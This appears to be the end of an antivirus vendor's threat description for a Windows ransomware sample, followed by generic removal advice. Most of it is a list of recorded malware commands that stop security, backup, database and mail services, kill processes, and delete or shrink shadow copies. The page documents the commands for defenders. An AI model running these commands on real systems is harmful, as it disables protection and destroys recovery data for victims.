  • '%WINDIR%\syswow64\net1.exe' stop PDVFSService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos MCS Agent" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos MCS Client" /y
  • '%WINDIR%\syswow64\net1.exe' stop KAVFS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop kavfsslp /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Message Router" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$VEEAMSQL2008R2 /y
  • '%WINDIR%\syswow64\net1.exe' stop ntrtscan /y
  • '%WINDIR%\syswow64\net1.exe' stop MySQL80 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop KAVFS /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM steam.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop PDVFSService /y
  • '%WINDIR%\syswow64\net1.exe' stop "Zoolz 2 Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$BKUPEXEC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MySQL80 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ntrtscan /y
  • '%WINDIR%\syswow64\net1.exe' stop POP3Svc /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM outlook.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Zoolz 2 Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamCloudSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$BKUPEXEC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop wbengine /y
  • '%WINDIR%\syswow64\net1.exe' stop ARSM /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Message Router" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$VEEAMSQL2008R2 /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Device Control Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLTELEMETRY$ECWDB2 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “SQLsafe Filter Service” /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM dbeng50.exe /F
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TrueKeyScheduler /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Device Control Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLTELEMETRY$ECWDB2 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\net1.exe' stop SAVService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLTELEMETRY /y
  • '%WINDIR%\syswow64\net1.exe' stop masvc /y
  • '%WINDIR%\syswow64\net1.exe' stop “Veeam Backup Catalog Data Service” /y
  • '%WINDIR%\syswow64\net1.exe' stop sophossps /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C net stop sophossps /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLTELEMETRY /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop masvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “Veeam Backup Catalog Data Service” /y
  • '%WINDIR%\syswow64\net1.exe' stop kavfsslp /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos MCS Client" /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mysqld.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos MCS Agent" /y
  • '%WINDIR%\syswow64\net1.exe' stop SmcService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop POP3Svc /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamRESTSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop SstpSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamBackupSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$TPS /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM oomm.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop VeeamDeploySvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamBackupSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamCatalogSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • '%WINDIR%\syswow64\net1.exe' stop AcronisAgent /y
  • '%WINDIR%\syswow64\net1.exe' stop swi_filter /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamMountSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM powerpnt.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mspub.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamDeploySvc /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SstpSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop swi_update /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamDeploymentService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_filter /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop AcronisAgent /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SDRSVC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_update /y
  • '%WINDIR%\syswow64\net1.exe' stop SDRSVC /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • '%WINDIR%\syswow64\net1.exe' stop VeeamCatalogSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_update_64 /y
  • '%WINDIR%\syswow64\net1.exe' stop EPUpdateService /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlagent.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SAVService /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecAgentBrowser /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLServerADHelper100 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamCloudSvc /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SmcService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamRESTSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecAgentBrowser /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$BKUPEXEC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EPUpdateService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop svcGenericHost /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLServerADHelper100 /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlwriter.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM msftesql.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mydesktopqos.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$BKUPEXEC /y
  • '%WINDIR%\syswow64\net1.exe' stop swi_update_64 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Acronis VSS Provider" /y
  • '%WINDIR%\syswow64\net1.exe' stop svcGenericHost /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ARSM /y
  • '%WINDIR%\syswow64\net1.exe' stop "Acronis VSS Provider" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLSERVER /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SBSMONITORING /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mbamtray.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SNAC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Web Control Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop tmlisten /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLSERVERAGENT /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Clean Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecManagementService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SamSs /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • '%WINDIR%\syswow64\net1.exe' stop MySQL57 /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamTransportSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLSERVERAGENT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop tmlisten /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecManagementService /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLSafeOLRService /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Clean Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqboreservie.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$VEEAMSQL2012 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MySQL57 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamTransportSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamEnterpriseManagerSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecVSSProvider /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecVSSProvider /y
  • '%WINDIR%\syswow64\net1.exe' stop TrueKeyScheduler /y
  • '%WINDIR%\syswow64\net1.exe' stop SNAC /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Veeam Backup Catalog Data Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop W3Svc /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SBSMONITORING /y
  • '%WINDIR%\syswow64\net1.exe' stop EsgShKernel /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM exel.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos System Protection Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlservr.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EsgShKernel /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos System Protection Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop MSOLAP$SQL_2008 /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$PRACTICEMGT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$VEEAMSQL2012 /y
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM dbsnmp.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$TPSAMA /y
  • '%WINDIR%\syswow64\net1.exe' stop UI0Detect /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM ossd.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$SQL_2008 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PRACTICEMGT /y
  • '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$TPSAMA /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop UI0Detect /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM syntime.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop SamSs /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SBSMONITORING /y
  • '%WINDIR%\syswow64\net1.exe' stop "Sophos Web Control Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLAgent$PROD /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLSafeOLRService /y
  • '%WINDIR%\syswow64\net1.exe' stop “Acronis VSS Provider” /y
  • '%WINDIR%\syswow64\net1.exe' stop MsDtsServer100 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SHAREPOINT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop DCAgent /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McAfeeFrameworkMcAfeeFramework /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM wordpad.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop "Enterprise Client Service" /y
  • '%WINDIR%\syswow64\net1.exe' stop TmCCSF /y
  • '%WINDIR%\syswow64\net1.exe' stop FA_Scheduler /y
  • '%WINDIR%\syswow64\net1.exe' stop msftesql$PROD /y
  • '%WINDIR%\syswow64\net1.exe' stop SQLBrowser /y
  • '%WINDIR%\syswow64\net1.exe' stop MSOLAP$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "SQL Backups" /y
  • '%WINDIR%\syswow64\net1.exe' stop McAfeeFramework /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamHvIntegrationSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TmCCSF /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Enterprise Client Service" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop FA_Scheduler /y
  • '%WINDIR%\syswow64\net1.exe' stop "SQL Backups" /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamMountSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MsDtsServer100 /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop msftesql$PROD /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$VEEAMSQL2008R2 /y
  • '%WINDIR%\syswow64\net1.exe' stop “SQLsafe Filter Service” /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLBrowser /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McAfeeFramework /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamNFSSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop VeeamHvIntegrationSvc /y
  • '%WINDIR%\syswow64\net1.exe' stop DCAgent /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop Smcinst /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamEnterpriseManagerSvc /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM firefoxonfig.exe /F
  • '%WINDIR%\syswow64\net1.exe' stop MSExchangeIS /y
  • '%WINDIR%\syswow64\net1.exe' stop BackupExecJobEngine /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PROD /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLSERVER /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM thunderbird.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “Acronis VSS Provider” /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQLFDLauncher$SBSMONITORING /y
  • '%WINDIR%\syswow64\net1.exe' stop MSExchangeMGMT /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecJobEngine /y
  • '%WINDIR%\syswow64\net1.exe' stop McAfeeFrameworkMcAfeeFramework /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SBSMONITORING /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeMGMT /y
  • '%WINDIR%\syswow64\net1.exe' stop "Symantec System Recovery" /y
  • '%WINDIR%\syswow64\net1.exe' stop MSSQL$SHAREPOINT /y
  • '%WINDIR%\syswow64\net1.exe' stop Smcinst /y
  • '%WINDIR%\syswow64\net1.exe' stop ReportServer$TPS /y
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM msaess.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM oautoupds.exe /F
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin Delete Shadows /all /quiet
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Symantec System Recovery" /y
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeIS /y
  • '%WINDIR%\syswow64\net1.exe' stop klnagent /y

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android